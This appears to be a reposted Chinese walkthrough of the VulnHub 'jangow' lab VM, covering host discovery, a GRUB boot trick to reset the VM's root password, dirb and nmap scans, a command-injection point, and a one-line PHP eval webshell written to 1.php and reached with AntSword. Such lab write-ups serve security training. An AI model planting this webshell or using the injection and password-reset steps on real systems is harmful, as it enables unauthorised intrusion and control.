当前位置: 首页 > article >正文

vulnhub jangow靶机

article 2025/1/5 7:20:46

1.扫描靶机IP

arp-scan -l

如果扫不到靶机的话根据以下配置

启动时点击第二个 按回车

继续选择第二个 按e进入编辑

删除"recovery nomodeset"

在末尾添加"quiet splash rw init=/bin/bash"

Ctrl+x 启动进入如下界面

passwd修改root密码

重启电脑登录root修改网卡信息

编辑文件sudo vim /etc/network/interfaces (将网卡信息设置为自己的网卡,重启电脑即可生效。)

网络模式改为NAT模式后打开

2.信息收集

dirb http://192.168.47.131
nmap -sV -O -p- 192.168.47.131

3.寻找薄弱点

发现了注入点

输入个ls看看;发现能使用系统命令

4.漏洞利用

echo一句话木马

echo "<?php @eval(/$_POST[a]);?>" > 1.php

cat查看写没写进去

拿蚁剑去连接;连接成功


http://www.kler.cn/a/457830.html

相关文章:

  • java实验4 反射机制
  • 简易Type-C拉取5V/3A电流电路分享
  • springcloud篇3-docker需熟练掌握的知识点
  • 【LC】191. 位1的个数
  • 用uniapp写一个播放视频首页页面代码
  • 商用车自动驾驶,迎来大规模量产「临界点」?
  • 《云计算能不能真正实现按需付费?》
  • unplugin-vue-router 的基本使用
  • 机器学习周报-TCN文献阅读
  • vulnhub DriftingBlues6靶机
  • C++ 设计模式:装饰模式(Decorator Pattern)
  • 如何给 Flask 项目创建 Systemd 服务 ?
  • 【Maven】属性管理
  • 基于云计算的资源管理系统
  • ModbusTCP转Profinet:工业通信的利器
  • TCP网络编程(一)—— 服务器端模式和客户端模式
  • NestJS 微服务架构:从单体到分布式
  • 【开源免费】基于SpringBoot+Vue.JS租房管理系统(JAVA毕业设计)
  • 客户案例:基于慧集通平台集成打通小满CRM+金蝶云星空+钉钉
  • 2024年数字政府服务能力优秀创新案例汇编(附下载)
  • ubuntu卸载docker
  • 闲谭Scala(2)--安装与环境配置
  • 【Golang 面试题】每日 3 题(七)
  • 对话 Project Astra 研究主管:打造通用 AI 助理,主动视频交互和全双工对话是未来重点
  • 【数字化】华为一体四面细化架构蓝图
  • coturn docker 项目 搭建【一切正常】